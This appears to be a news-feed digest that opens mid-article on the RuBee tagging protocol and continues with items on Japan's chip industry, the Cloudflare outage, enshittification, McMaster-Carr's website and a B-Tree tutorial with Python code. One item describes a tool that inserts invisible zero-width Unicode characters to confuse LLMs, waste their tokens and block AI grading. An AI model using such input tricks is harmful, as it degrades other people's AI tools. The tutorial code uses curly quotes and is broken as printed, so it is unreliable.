Protection forces at privately-operated atomic energy facilities, such as civilian nuclear power plants, are subject to licensing and scrutiny by the Nuclear Regulatory Commission. Things step up further at the many facilities operated by the National Nuclear Security Administration (NNSA). Protection forces for NNSA facilities are trained at the Department of Energy's National Training Center, at the former Manzano Base here in Albuquerque. Concern over adequate physical protection of NNSA facilities has lead Sandia National Laboratories to become one of the premier centers for R&D in physical security. Teams of scientists and engineers have applied sometimes comical scientific rigor to "guns, gates, and guards," the traditional articulation of physical security in the nuclear world.

That scope includes the evaluation of new technology for the management of protection forces, which is why Oak Ridge National Laboratory launched an evaluation program for the RuBee tagging of firearms in their armory. The white paper on this evaluation is curiously undated, but citations "retrieved 2008" lead me to assume that the evaluation happened right around the middle of the '00s. At the time, VAI seems to have been involved in some ultimately unsuccessful partnership with Oracle, leading to the branding of the RuBee system as Oracle Dot-Tag Server. The term "Dot-Tag" never occurs outside of very limited materials around the Oracle partnership, so I'm not sure if it was Oracle branding for RuBee or just some passing lark. In any case, Oracle's involvement seems to have mainly just been the use of the Oracle database for tracking inventory data---which was naturally replaced by PostgreSQL at Oak Ridge.

The Oak Ridge trial apparently went well enough, and around the same time, the Pantex Plant in Texas launched an evaluation of RuBee for tracking classified tools. Classified tools are a tricky category, as they're often metallic and often stored in metallic cases. During the trial period, Pantex tagged a set of sample classified tools with RuBee tags and then transported them around the property, testing the ability of the RuBee controllers to reliably detect them entering and exiting areas of buildings. Simultaneously, Pantex evaluated the use of RuBee tags to track containers of "chemical products" through the manufacturing lifecycle. Both seem to have produced positive results.

There are quite a few interesting and strange aspects of the RuBee system, a result of its purpose-built Visibility Network nature. A RuBee controller can have multiple antennas that it cycles through. RuBee tags remain in a deep-sleep mode for power savings until they detect a RuBee carrier during their periodic wake cycle. When a carrier is detected, they fully wake and listen for traffic. A RuBee controller can send an interrogate message and any number of tags can respond, with an interesting and novel collision detection algorithm used to ensure reliable reading of a large number of tags.

The actual RuBee protocol is quite simple, and can also be referred to as IEEE 1902.1 since the decision of VAI to put it through the standards process. Packets are small and contain basic addressing info, but they can also contain arbitrary payload in both directions, perfect for data loggers or sensors. RuBee tags are identified by something that VAI oddly refers to as an "IP address," causing some confusion over whether or not VAI uses IP over 1902.1. They don't, I am confident saying after reading a whole lot of documents. RuBee tags, as standard, have three different 4-byte addresses. VAI refers to these as "IP, subnet, and MAC," 2 but these names are more like analogies. Really, the "IP address" and "subnet" are both configurable arbitrary addresses, with the former intended for unicast traffic and the latter for broadcast. For example, you would likely give each asset a unique IP address, and use subnet addresses for categories or item types. The subnet address allows a controller to interrogate for every item within that category at once. The MAC address is a fixed, non-configurable address derived from the tag's serial number. They're all written in the formats we associate with IP networks, dotted-quad notation, as a matter of convenience.

And that's about it as far as the protocol specification, besides of course the physical details which are a 131,072 Hz carrier, 1024 Hz data clock, either ASK or BPSK modulation. The specification also describes an interesting mode called "clip," in which a set of multiple controllers interrogate in exact synchronization and all tags then reply in exact synchronization. Somewhat counter-intuitively, because of the ability of RuBee controllers to separate out multiple simultaneous tag transmissions using an anti-collision algorithm based on random phase shifts by each tag, this is ideal. It allows a room, say an armory, full of RuBee controllers to rapidly interrogate the entire contents of the room. I think this feature may have been added after the Oak Ridge trials...

RuBee is quite slow, typically 1,200 baud, so inventorying a large number of assets can take a while (Oak Ridge found that their system could only collect data on 2-7 tags per second per controller). But it's so robust that it an achieve a 100% read rate in some very challenging scenarios. Evaluation by the DoE and the military produced impressive results. You can read, for example, of a military experiment in which a RuBee antenna embedded in a roadway reliably identified rifles secured in steel containers in passing Humvees.

Paradoxically, then, one of the benefits of RuBee in the military/defense context is that it is also difficult to receive. Here is RuBee's most interesting trick: somewhat oversimplified, the strength of an electrical radio signal goes as 1/r, while the strength of a magnetic field goes as 1/r^3. RuBee equipment is optimized, by antenna design, to produce a minimal electrical field. The result is that RuBee tags can very reliably be contacted at short range (say, around ten feet), but are virtually impossible to contact or even detect at ranges over a few hundred feet. To the security-conscious buyer, this is a huge feature. RuBee tags are highly resistant to communications or electronic intelligence collection.

Consider the logical implications of tagging the military's rifles. With conventional RFID, range is limited by the size and sensitivity of the antenna. Particularly when tags are incidentally powered by a nearby reader, an adversary with good equipment can detect RFID tags at very long range. VAI heavily references a 2010 DEFCON presentation, for example, that demonstrated detection of RFID tags at a range of 80 miles. One imagines that opportunistic detection by satellite is feasible for a state intelligence agency. That means that your rifle asset tracking is also revealing the movements of soldiers in the field, or at least providing a way to detect their approach.

Most RuBee tags have their transmit power reduced by configuration, so even the maximum 100' range of the protocol is not achievable. VAI suggests that typical RuBee tags cannot be detected by radio direction finding equipment at ranges beyond 20', and that this range can be made shorter by further reducing transmit power.

Once again, we have caught the attention of the Department of Energy. Because of the short range of RuBee tags, they have generally been approved as not representing a COMSEC or TEMPEST hazard to secure facilities. And that brings us back to the very beginning: why does the DoE use a specialized, technically interesting, and largely unique radio protocol to fulfill such a basic function as nagging people that have their phones? Because RuBee's security properties have allowed it to be approved for use adjacent to and inside of secure facilities. A RuBee tag, it is thought, cannot be turned into a listening device because the intrinsic range limitation of magnetic coupling will make it impossible to communicate with the tag from outside of the building. It's a lot like how infrared microphones still see some use in secure facilities, but so much more interesting!

VAI has built several different product lines around RuBee, with names like Armory 20/20 and Shot Counting Allegro 20/20 and Store 20/20. The founder started his career in eye health, remember. None of them are that interesting, though. They're all pretty basic CRUD applications built around polling multiple RuBee controllers for tags in their presence.

And then there's the "Alert 20/20 DoorGuard:" a metal pedestal with a RuBee controller and audio announcement module, perfect for detecting government cell phones.

One of the strangest things about RuBee is that it's hard to tell if it's still a going concern. VAI's website has a press release section, where nothing has been posted since 2019. The whole website feels like it was last revised even longer ago. When RuBee was newer, back in the '00s, a lot of industry journals covered it with headlines like "the new RFID." I think VAI was optimistic that RuBee could displace all kinds of asset tracking applications, but despite some special certifications in other fields (e.g. approval to use RuBee controllers and tags around pacemakers in surgical suites), I don't think RuBee has found much success outside of military applications.

RuBee's resistance to shielding is impressive, but RFID read rates have improved considerably with new DSP techniques, antenna array designs, and the generally reduced cost of modern RFID equipment. RuBee's unique advantages, its security properties and resistance to even intentional exfiltration, are interesting but not worth much money to buyers other than the military.

So that's the fate of RuBee and VAI: defense contracting. As far as I can tell, RuBee and VAI are about as vital as they have ever been, but RuBee is now installed as just one part of general defense contracts around weapons systems, armory management, and process safety and security. IEEE standardization has opened the door to use of RuBee by federal contractors under license, and indeed, Lockheed Martin is repeatedly named as a licensee, as are firearms manufacturers with military contracts like Sig Sauer.

Besides, RuBee continues to grow closer to the DoE. In 2021, VAI appointed Lisa Gordon-Hagerty to it board of directors. Gordon-Hagerty was undersecretary of Energy and had lead the NNSA until the year before. This year, the New Hampshire Small Business Development Center wrote a glowing profile of VAI. They described it as a 25-employee company with a goal of hitting $30 million in annual revenue in the next two years.

Despite the outdated website, VAI claims over 1,200 RuBee sites in service. I wonder how many of those are Alert 20/20 DoorGuards? Still, I do believe there are military weapons inventory systems currently in use. RuBee probably has a bright future, as a niche technology for a niche industry. If nothing else, they have legacy installations and intellectual property to lean on. A spreadsheet of VAI-owned patents on RuBee, with nearly 200 rows, encourages would-be magnetically coupled visibility network inventors not to go it on their own. I just wish I could get my hands on a controller....

Japan's gamble to turn island of Hokkaido into global chip hub

Hacker News
www.bbc.com
2025-11-24 03:07:07
Comments...
Original Article

Suranjana Tewari Asia business correspondent, Hokkaido, Japan

Getty Images Colorful scenery of the flower garden at Shikisai-no-oka, Biei, Hokkaido, Japan Getty Images

Hokkaido is a tourism and agricultural region, but Rapidus is making chips there too

The island of Hokkaido has long been an agricultural powerhouse – now Japan is investing billions to turn it into a global hub for advanced semiconductors.

More than half of Japan's dairy produce comes from Hokkaido, the northernmost of its main islands. In winter, it's a wonderland of ski resorts and ice-sculpture festivals; in summer, fields bloom with bands of lavender, poppies and sunflowers.

These days, cranes are popping up across the island – building factories, research centres and universities focused on technology. It's part of Japan's boldest industrial push in a generation: an attempt to reboot the country's chip-making capabilities and reshape its economic future.

Locals say that beyond the cattle and tourism, Hokkaido has long lacked other industries. There's even a saying that those who go there do so only to leave.

But if the government succeeds in turning Hokkaido into Japan's answer to Silicon Valley - or "Hokkaido Valley", as some have begun to call it - the country could become a new contender in the $600bn (£458bn) race to supply the world's computer chips.

An unlikely player

At the heart of the plan is Rapidus, a little-known company backed by the government and some of Japan's biggest corporations including Toyota, Softbank and Sony.

Born out of a partnership with IBM, it has raised billions of dollars to build Japan's first cutting-edge chip foundry in decades.

The government has invested $12bn in the company, so that it can build a massive semiconductor factory or "fab" in the small city of Chitose.

In selecting the Hokkaido location, Rapidus CEO Atsuyoshi Koike points to Chitose's water, electricity infrastructure and its natural beauty.

Mr Koike oversaw the fab design, which will be completely covered in grass to harmonise with Hokkaido's landscape, he told the BBC.

Local authorities have also flagged the region as being at lower risk of earthquakes compared to other potential sites in Japan.

A key milestone for Rapidus came with the delivery of an extreme ultraviolet lithography (EUV) system from the Dutch company ASML.

The high-tech machinery helped bring about Rapidus' biggest accomplishment yet earlier this year – the successful production of prototype two nanometre (2nm) transistors.

These ultra-thin chips are at the cutting edge of semiconductor technology and allow devices to run faster and more efficiently.

It's a feat only rival chip makers TSMC and Samsung have accomplished. Intel is not pursuing 2nm, it is leapfrogging from 7nm straight to 1.8nm.

"We succeeded in manufacturing the 2nm prototype for the first time in Japan, and at an unprecedented speed in Japan and globally," Mr Koike said.

He credits the IBM partnership for helping achieve the breakthrough.

Tie-ups with global companies are essential to acquiring the technology needed for this level of chips, he added.

The sceptics

Rapidus is confident that it is on track to mass produce 2nm chips by 2027. The challenge will be achieving the yield and quality that is needed to survive in an incredibly competitive market – the very areas where Taiwan and South Korea have pulled ahead.

TSMC for example has achieved incredible success in mass production, but making high-end chips is costly and technically demanding.

In a 2024 report, the Asean+3 Macroeconomic Research Office highlighted that although Rapidus is receiving government subsidies and consortium members are contributing funds: "The financing falls short of the expected 5 trillion yen ($31.8bn; £24.4bn) needed to start mass production."

The Center for Security and International Studies (CSIS) has previously said: "Rapidus has no experience in manufacturing advanced chips, and to date there is no indication that it will be able to access actual know-how for such an endeavour from companies with the requisite experience (ie TSMC and Samsung)."

Finding customers may also be a challenge – Samsung and TSMC have established relationships with global companies that have been buying their chips for years.

The lost decades

Nevertheless, Japan's government is pouring money into the chip industry - $27bn between 2020 and early 2024 - a larger commitment relative to its gross domestic product (GDP) than the US made through the Biden-era CHIPS Act .

In late 2024, Tokyo unveiled a $65bn package for Artificial Intelligence (AI) and semiconductors that could further support Rapidus's expansion plans.

This comes after decades of decline. Forty years ago Japan made more than half of the world's semiconductors. Today, it produces just over 10%.

Many point to US-Japan trade tensions in the 1980s as a turning point.

Naoyuki Yoshino, professor emeritus at Keio University, said Japan lost out in the technology stakes to Taiwan and South Korea in the 1980s, leaving domestic companies weaker.

Unlike its rivals, Japan failed to sustain subsidies to keep its chipmakers competitive.

But Mr Koike says that mentality has changed.

"The [national] government and local government are united in supporting our industry to revive once again."

Getty Images Construction of a new semiconductor factory by Rapidus Corp. in Chitose, Hokkaido Getty Images

Rapidus has already achieved a production prototype of a 2nm chip

Japan's broader economic challenges also loom large. Its population is shrinking while the number of elderly citizens continues to surge. That has determined the national budget for years and has contributed to slowing growth.

More than a third of its budget now goes to social welfare for the elderly, and that squeezes the money available for research, education and technology, Prof Yoshino says.

Japan also faces a severe shortage of semiconductor engineers – an estimated 40,000 people in the coming years.

Rapidus is partnering with Hokkaido University and others to train new workers, but agrees it will have to rely heavily on foreigners, at a time when public support for workers coming into the country for employment is low.

Growing an ecosystem

The government's push is already attracting major global players.

TSMC is producing 12–28nm chips in Kumamoto, on the south-western island of Kyushu - a significant step for Japan, even if it lags behind the company's cutting-edge production in Taiwan.

The expansion has transformed the local economy, attracting suppliers, raising wages, and leading to infrastructure and service developments.

Japan's broader chip revival strategy appears to be following a playbook: establish a "fab", and an entire ecosystem will tend to follow.

TSMC started building a second plant on Kyushu in October this year, which is due to begin production by the end of 2027.

Beyond Rapidus and TSMC, local players like Kioxia and Toshiba are also getting government backing.

Kioxia has expanded fabs in Yokkaichi and Kitakami with state funds and Toshiba has built one in Ishikawa. Meanwhile, ROHM has been officially designated as a company that provides critical products under Tokyo's economic security framework.

American memory chipmaker Micron will also receive $3.63bn in subsidies from the Japanese government to grow facilities in Hiroshima, while Samsung is building a research and development facility in Yokohama.

Hokkaido is seeing similar momentum. Chipmaking equipment companies ASML and Tokyo Electron have both opened offices in Chitose, off the back of Rapidus building a production facility there.

"This will make a form of 'global ecosystem'," Mr Koike says, "where we work together to be able to produce semiconductors that contribute to the world."

Getty Images Rapidus Corporation President Atsuyoshi Koike bows during a press conference in Tokyo Getty Images

The CEO of Rapidus says the firm's edge is bespoke chips that can be delivered quickly

Mr Koike said Rapidus's key selling point would be - as its name suggests - an ability to produce custom chips faster than competitors, rather than competing directly with other players.

"TSMC leads the world, with Intel and Samsung close behind. Our edge is speed - we can produce and deliver chips three to four times faster than anyone else. That speed is what gives us an edge in the global semiconductor race," Mr Koike said.

Big bet

Global demand for chips is surging with the rise of AI, while Japan's automakers - still recovering from pandemic-era supply shocks - are pressing for more reliable, domestically or regionally sourced production across the entire supply chain, from raw materials to finished chips.

Securing control over chip manufacturing is being seen as a national security priority, both in Japan and elsewhere, as recent trade frictions and geopolitical tensions between China and Taiwan raise concerns around the risks of relying on foreign suppliers.

"We'd like to provide products from Japan once again – products that are powerful and with great new value," Mr Koike said.

For Japan's government, investing in Rapidus is a high-stakes gamble to revive its semiconductor industry and more broadly its tech power.

And some analysts say it may be the country's best chance to build a domestic ecosystem to supply advanced chips to its many manufacturers, and one day become a formidable challenger in the global market.

Additional reporting by Jaltson Akkanath Chummar

The Cloudflare outage was a good thing

Hacker News
gist.github.com
2025-11-24 03:04:10
Comments...
Original Article

Cloudflare, the CDN provider, suffered a massive outage today. Some of the world's most popular apps and web services were left inaccessible for serveral hours whilst the Cloudflare team scrambled to fix a whole swathe of the internet.

And that might be a good thing.

The proximate cause of the outage was pretty mundane: a bad config file triggered a latent bug in one of Cloudflare's services . The file was too large (details still hazy) and this led to a cascading failure across Cloudflare operations. Probably there is some useful post-morteming about canary releases and staged rollouts.

But the bigger problem, the ultimate cause, behind today's chaos is the creeping centralisation of the internet and a society that is sleepwalking into assuming the net is always on and always working .

It's not just "trivial" stuff like Twitter and League of Legends that were affected, either. A friend of mine remarked caustically about his experience this morning

I couldn't get air for my tyres at two garages because of cloudflare going down. Bloody love the lack of resilience that goes into the design when the machine says "cash only" and there's no cash slot. So flat tires for everyone! Brilliant.

We are living in a society where every part of our lives is increasingly mediated through the internet: work, banking, retail, education, entertainment, dating, family, government ID and credit checks. And the internet is increasingly tied up in fewer and fewer points of failure .

It's ironic because the internet was actually designed for decentralisation, a system that governments could use to coordinate their response in the event of nuclear war. But due to the economics of the internet, the challenges of things like bots and scrapers, more of more web services are holed up in citadels like AWS or behind content distribution networks like Cloudflare.

Outages like today's are a good thing because they're a warning . They can force redundancy and resilience into systems. They can make the pillars of our society - governments, businesses, banks - provide reliable alternatives when things go wrong.

(Ideally ones that are completely offline)

You can draw a parallel to how COVID-19 shook up global supply chains: the logic up until 2020 was that you wanted your system to be as lean and efficient as possible, even if it meant relying totally on international supplies or keeping as little spare inventory as possible. After 2020 businesses realised they needed to diversify and build slack in the system to tolerate shocks.

In the same way that growing one kind of banana, nearly resulted in bananas going extinct , we're drifing towards a society that can't survive without digital infrastructure; and a digital infrastructure that can't operate without two or three key players. One day there's going to be an outage, a bug, or cyberattack from a hostile state, that demonstrates how fragile that system is.

Embrace outages, and build redundancy.

A free tool that stuns LLMs with thousands of invisible Unicode characters

Hacker News
gibberifier.com
2025-11-24 03:00:31
Comments...
Original Article

Block AIs from reading your text with invisible Unicode characters while preserving meaning for humans.

How it works: This tool inserts invisible zero-width Unicode characters between each character of your input text. The text will look the same but will be much longer and can help stop AI plagarism. It also helps to waste tokens, causing users to run into ratelimits faster.

How to use: This tool works best when gibberifying the most important parts of an essay prompt, up to about 500 characters. This makes it harder for the AI to detect while still functioning well in Google Docs. Some AI models will crash or fail to process the gibberified text, while others will respond with confusion or simply ignore everything inside the gibberified text.

Use cases: Anti-plagiarism, text obfuscation for LLM scrapers, or just for fun!

Even just one word's worth of gibberified text is enough to block something like Flint AI from grading a session.

‘Enshittification’: how we got the internet no one asked for – podcast

Guardian
www.theguardian.com
2025-11-24 03:00:25
Tech critic Corey Doctorow explains why for so many the internet – from Amazon to Google to Instagram – seems to be getting worse Do you ever get the feeling that the internet isn’t what it used to be? Well, tech critic Corey Doctorow thinks you’re right – and he has a term to describe it too: ‘ensh...
Original Article

Tech critic Corey Doctorow explains why for so many the internet – from Amazon to Google to Instagram – seems to be getting worse

Do you ever get the feeling that the internet isn’t what it used to be?

Well, tech critic Corey Doctorow thinks you’re right – and he has a term to describe it too: ‘enshittification’.

He lays out his three-step theory to Nosheen Iqbal , explaining why sites from Amazon to Google to Instagram seem to offer a worsening experience … and what can be done to stop it.

Anonymous Man Uses Smartphone in Bed at Home at Night. Handsome Guy Browsing Social Media, Reading News, Doing Online Shopping Late at Night. Focus on Hand Holding Mobile Phone Covering Face
Photograph: gorodenkoff/Getty Images

McMaster Carr – The Smartest Website You Haven't Heard Of

Hacker News
www.bedelstein.com
2025-11-24 02:57:34
Comments...
Original Article

Most people I know haven't even heard of it, but mcmaster.com is the best e-commerce site I've ever used.

McMaster-Carr is an industrial supply company. They sell nuts, bolts, bushings, bearings – pretty much anything an engineer needs to build stuff. I've purchased from them dozens of times over the past few years, both for personal and school projects.

But what makes their website so great? And why should an industrial supply company have the best e-commerce site on the internet?

mcmaster.com is great because it does what it needs to, and nothing else.

First, let's look at the visual design of the site. Minimal, mostly grayscale, with accents of green and yellow. There are no popups, animations, banners, carousels, or videos – just a calm, static page with categories and a search bar. Even the images are grayscale, to avoid inadvertently catching your eye.

McMaster Carr homepage

It's not the most visually stunning site, but that doesn't matter here - McMaster has chosen function over form.

A user's goal when they visit McMaster-Carr is to find their part as quickly as possible. The website is designed entirely around that fact. Users rarely come just to browse, so there are no AI recommendation algorithms, featured products, new arrivals – that doesn't make sense in this context. People visit McMaster-Carr with high intent to buy a specific part, that's it.

So how do we get from the 700,000 products in their catalog down to one part? Here's what I do.

Let's say I'm searching for a bolt:

  1. I type "bolt" into the search bar

  2. McMaster shows me several subcategories: hex head, socket head, set screws, etc. I'm looking for socket head, so I select that one.

  3. Now I move my attention to the left nav bar, which shows me several filtering options. Bolts are commonly specified by their thread size (e.g. 1/4"-20), and their length. I'm looking for a 1/4"-20 x 1" bolt, meaning that the bolt's diameter is 1/4" and its length is 1", so I select these filters.

  4. There are over a dozen other filters, such as material, hardness, and head size. Once I've applied enough filters, The main search window shows individual items, rather than subcategories. Here I can select an item and add it to cart.

McMaster's search interface is the main reason for its design superiority. Everything on this page is designed to get you to your part as quickly as possible. The filter sections are simple and elegant, providing schematic illustrations when necessary. The illustrations are always simplified to convey only relevant information, as to not distract you from the focus of your search.

Results pages also show helpful drop-downs which explain the parts you're looking at. It's like an engineer's handbook and catalog in one. Engineers are often looking up terminology on the fly anyways, so having this information embedded into the site saves valuable time.

McMaster's filters are not only useful for a targeted search, but also for deciding what it is you want. Sometimes I'll search with only a general idea of the part I need, and then I'll use the subcategory descriptions to determine specifics. For example, I may know that I need some type of lock washer, but I'm unsure which one is best for my application. I can use the images and descriptions to decide on the right configuration.

lock washers

many varieties of lock washers

McMaster is able to provide such intuitive searching and filtering because everything that they sell is highly legible – it's all defined by quantitative specs. There is nothing intangible to deal with, like brands, product photos, or other marketing fluff. Even still, they do a much better job than other industrial websites like Grainger , DigiKey , or Home Depot .

As a point of comparison, Amazon does a terrible job of filtering items. Amazon has an order of magnitude more products on its site, which admittedly makes the job a lot more difficult. However, even generic filters, like price, suck. I won't get too far into my disdain for amazon's UI design, other people have already written too much about it [1] and that's not the point, but it's interesting to contrast McMaster with what everyone sees as "the" e-commerce site.

Take Amazon's price picker: Why is it two text boxes? Why not a slider? This has always annoyed me, since it's much easier for me to drag a slider than to manually type in my max price. And the quick-select ranges are literally the exact same no matter the product. If I search for a pen, nearly every result I want should be under $25. If I search for a trampoline, every result I want should probably be over $200. What the fuck?! I guess this somehow won the A/B test, but I can't think of a reason why.

Amazon Price Filter

Amazon Price Filter

Finally, one of the most brilliant parts of McMaster's product is that for nearly every part, they have a CAD file that you can instantly download into your 3D models. Mechanical engineers mock up designs in CAD programs before actually building them, and having access to pre-modeled parts saves time. (Imagine having to manually model all your nuts and bolts.) McMaster even has extensions for popular CAD programs which allow you to import part files directly, instead of using their website. This makes engineer's lives 10x easier (not to mention making them more likely to purchase from McMaster-Carr). The closest analogy to this is AR try-on, but that's not even very accurate. The point of AR try-on is to determine whether you like the item you're about to buy, whereas the point of McMaster's CAD downloads is to speed up an engineer's workflow. In most cases, they already know which part they need, it's just a matter of completing the CAD model before they can start building the real thing.

Improvements

Mcmaster.com is nearly perfect. It's a website that would make Steve Krug smile. My only suggestion would be to make the search bar on the home page more prominent. It's visually overwhelming to comb through dozens of product photos, so I pretty much always use the search bar to start narrowing down items. The main area of the homepage is effectively dead space, while the search bar is relatively tiny. New users might miss it, wasting time.

I decided to write about McMaster-Carr because it is so rare to see such careful thought go into an industrial web app, far removed from the commotion of silicon valley, web3, D2C, and the other typical subjects of pixel perfection.

Mcmaster.com is a product that understands its customer. The minimal, functional design allows users to find their parts as quickly as possible, nothing more or less. It's an unexpected reminder to not get lost in the allure of smooth gradients, 3D animations, or slick fonts, and instead relentlessly focus on what it is your customers really want.

"If something is 100 percent functional, it is always beautiful...there is no such thing as an ugly nail or an ugly hammer but there's lots of ugly cars, because not everything in a car is functional...sometimes it's very beautiful, if the person who designed it has very good taste, but sometimes it's ugly." [2]

Footnotes

[1] "Jeff Bezos is an infamous micro-manager. He micro-manages every single pixel of Amazon's retail site. He hired Larry Tesler, Apple's Chief Scientist and probably the very most famous and respected human-computer interaction expert in the entire world, and then ignored every goddamn thing Larry said for three years until Larry finally -- wisely -- left the company. Larry would do these big usability studies and demonstrate beyond any shred of doubt that nobody can understand that frigging website, but Bezos just couldn't let go of those pixels, all those millions of semantics-packed pixels on the landing page. They were like millions of his own precious children. So they're all still there, and Larry is not." https://gist.github.com/chitchcock/1281611

B-Trees: Why Every Database Uses Them

Hacker News
mehmetgoekce.substack.com
2025-11-24 02:35:17
Comments...
Original Article

Your database has 10 million user records. You query for one user by ID. The database returns the result in 3 milliseconds. How?

If the database scanned all 10 million records sequentially, it would take seconds, maybe minutes. But databases don’t scan. They use an index—and that index is almost certainly a B-Tree.

Every major database system uses B-Trees: MySQL InnoDB, PostgreSQL, SQLite, MongoDB’s WiredTiger storage engine, Oracle Database, Microsoft SQL Server. It’s not a coincidence. B-Trees solve a fundamental problem: how to efficiently find data on disk when disk access is thousands of times slower than memory access.

This is the story of why binary search trees fail on disk, how B-Trees fix that problem, and why after 50+ years, we’re still using them.

Let’s start with what doesn’t work: binary search trees (BSTs) on disk.

In memory, binary search trees are excellent. Each node stores one key and has two children (left and right). Keys in the left subtree are smaller, keys in the right subtree are larger. Finding a key takes O(log₂ n) comparisons.

Figure 1: Binary search tree with 7 nodes. Finding key 11 takes 3 comparisons: 15 → 7 → 11.

For 1 million records, a balanced BST has height log₂(1,000,000) ≈ 20. That’s 20 comparisons to find any record.

In memory, this is fast. Each comparison is a pointer dereference (~0.0001 milliseconds on modern CPUs). Total lookup: 0.002 ms.

On disk, this is catastrophic. Here’s why:

The smallest unit of disk access is a block (typically 4 KB to 16 KB). To read a single byte from disk, you must read the entire block containing it.

Disk access times:

Disk is 100-100,000x slower than RAM.

With a BST on disk, each node is stored in a separate disk block. Traversing from parent to child requires a disk seek.

For 1 million records:

  • Height: 20 nodes

  • Disk seeks: 20

  • Time on HDD: 20 × 10 ms = 200 milliseconds

  • Time on SSD: 20 × 0.1 ms = 2 milliseconds

That’s acceptable for SSDs, but terrible for HDDs. And it gets worse as the tree grows.

For 1 billion records:

  • Height: 30 nodes

  • Time on HDD: 30 × 10 ms = 300 milliseconds

  • Time on SSD: 30 × 0.1 ms = 3 milliseconds

The fundamental problem: BST fanout is too low (only 2 children per node). We need more children per node to reduce tree height.

You might think: “Just keep the tree balanced!” Red-black trees and AVL trees do this.

The problem isn’t just tree height—it’s maintenance cost. Balancing requires rotating nodes and updating pointers. In memory, this is cheap (a few pointer writes). On disk, it’s expensive:

  1. Read the node from disk (4 KB block)

  2. Modify the node in memory

  3. Write the modified node back to disk (4 KB block)

  4. Update parent pointers (more disk I/O)

For a tree with frequent inserts and deletes, constant rebalancing kills performance. We need a data structure that:

  • Has high fanout (many children per node) → reduces height

  • Requires infrequent rebalancing → reduces I/O overhead

That data structure is the B-Tree.

A B-Tree is a self-balancing tree optimized for disk access. Instead of 2 children per node (binary tree), a B-Tree node has hundreds or thousands of children.

Key idea: Each B-Tree node fits in one disk block (4 KB to 16 KB). Since we must read an entire block anyway, pack as many keys as possible into it.

A B-Tree node stores:

  • N keys (sorted)

  • N + 1 pointers to child nodes

Each key acts as a separator: keys in child[i] are less than key[i], keys in child[i+1] are greater than or equal to key[i].

Figure 2: B-Tree with fanout ~100. Root has 2 keys and 3 children. Internal nodes have 4 keys and 5 children. Leaf nodes contain actual data.

B-Trees have three types of nodes:

Root node: The top of the tree. There’s always exactly one root.

Internal nodes: Middle layers that guide searches. They store separator keys and pointers, but no actual data.

Leaf nodes: Bottom layer containing the actual data (key-value pairs). All leaves are at the same depth.

This is a B+-Tree , the most common variant. B+-Trees store data only in leaves, while B-Trees can store data in internal nodes too. Every major database uses B+-Trees, but calls them “B-Trees” for simplicity.

Binary tree (fanout = 2):

  • 1 million records → height = 20

  • 1 billion records → height = 30

B-Tree (fanout = 100):

  • 1 million records → height = 3 (because 100³ = 1,000,000)

  • 1 billion records → height = 5 (because 100⁵ = 10,000,000,000)

B-Tree (fanout = 1000):

  • 1 million records → height = 2 (because 1000² = 1,000,000)

  • 1 billion records → height = 3 (because 1000³ = 1,000,000,000)

High fanout = fewer disk seeks = faster queries.

Finding a key in a B-Tree is a root-to-leaf traversal with binary search at each node.

Algorithm:

  1. Start at the root node

  2. Binary search the keys in the current node to find the separator key range

  3. Follow the corresponding child pointer

  4. Repeat until reaching a leaf node

  5. In the leaf, either find the key or conclude it doesn’t exist

Time complexity:

  • Tree height: O(log_fanout n)

  • Binary search per node: O(log₂ fanout)

  • Total: O(log n)

Example: Find key 72 in a B-Tree with fanout 100 and 1 million records.

Step 1: Read root node (1 disk I/O)
  Keys: [50, 100, 150, ...]
  72 is between 50 and 100
  Follow child pointer 2

Step 2: Read internal node (1 disk I/O)
  Keys: [55, 60, 65, 70, 75, 80, ...]
  72 is between 70 and 75
  Follow child pointer 5

Step 3: Read leaf node (1 disk I/O)
  Keys: [71, 72, 73, 74]
  Found! Return value for key 72

Total: 3 disk I/O operations = 30 ms on HDD, 0.3 ms on SSD

Let’s implement a simplified but functional B-Tree in Python.

from typing import List, Optional, Tuple
from dataclasses import dataclass, field


@dataclass
class BTreeNode:
    “”“
    B-Tree node storing keys and child pointers.

    Attributes:
        keys: Sorted list of keys in this node
        children: List of child node pointers (len = len(keys) + 1)
        is_leaf: True if this is a leaf node (no children)

    Invariants:
        - len(children) == len(keys) + 1 (for internal nodes)
        - All keys are sorted
        - Keys in children[i] < keys[i] < keys in children[i+1]
    “”“
    keys: List[int] = field(default_factory=list)
    children: List[’BTreeNode’] = field(default_factory=list)
    is_leaf: bool = True

    def __repr__(self):
        return f”BTreeNode(keys={self.keys}, is_leaf={self.is_leaf})”


class BTree:
    “”“
    B-Tree implementation with configurable order.

    Attributes:
        order: Maximum number of children per node (fanout)
        root: Root node of the tree

    Properties:
        - Each node has at most (order - 1) keys
        - Each non-root node has at least (order // 2 - 1) keys
        - Tree height is O(log_order n)

    Time Complexity:
        - Search: O(log n)
        - Insert: O(log n)
        - Delete: O(log n)

    Space Complexity: O(n)
    “”“

    def __init__(self, order: int = 100):
        “”“
        Initialize B-Tree.

        Args:
            order: Maximum number of children per node (fanout).
                   Higher order = fewer levels but larger nodes.
                   Typical values: 100-1000 for disk-based storage.
        “”“
        if order < 3:
            raise ValueError(”Order must be at least 3”)

        self.order = order
        self.root = BTreeNode()

    def search(self, key: int) -> Optional[int]:
        “”“
        Search for a key in the B-Tree.

        Args:
            key: The key to search for

        Returns:
            The key if found, None otherwise

        Time Complexity: O(log n) where n is number of keys
        “”“
        return self._search_recursive(self.root, key)

    def _search_recursive(self, node: BTreeNode, key: int) -> Optional[int]:
        “”“
        Recursively search for key starting from node.

        Uses binary search within each node to find the correct child.
        “”“
        # Binary search within this node
        i = self._binary_search(node.keys, key)

        # Found exact match
        if i < len(node.keys) and node.keys[i] == key:
            return key

        # Reached leaf without finding key
        if node.is_leaf:
            return None

        # Recurse into appropriate child
        # (In real implementation, this would be a disk I/O)
        return self._search_recursive(node.children[i], key)

    def _binary_search(self, keys: List[int], key: int) -> int:
        “”“
        Binary search to find insertion point for key.

        Returns:
            Index i where keys[i-1] < key <= keys[i]

        Time Complexity: O(log m) where m is number of keys in node
        “”“
        left, right = 0, len(keys)
        while left < right:
            mid = (left + right) // 2
            if keys[mid] < key:
                left = mid + 1
            else:
                right = mid
        return left

    def insert(self, key: int):
        “”“
        Insert a key into the B-Tree.

        Args:
            key: The key to insert

        Time Complexity: O(log n)

        Algorithm:
            1. Find the appropriate leaf node
            2. Insert key into leaf
            3. If leaf overflows (too many keys), split it
            4. Propagate split up the tree if necessary
        “”“
        root = self.root

        # If root is full, split it and create new root
        if len(root.keys) >= self.order - 1:
            new_root = BTreeNode(is_leaf=False)
            new_root.children.append(self.root)
            self._split_child(new_root, 0)
            self.root = new_root

        self._insert_non_full(self.root, key)

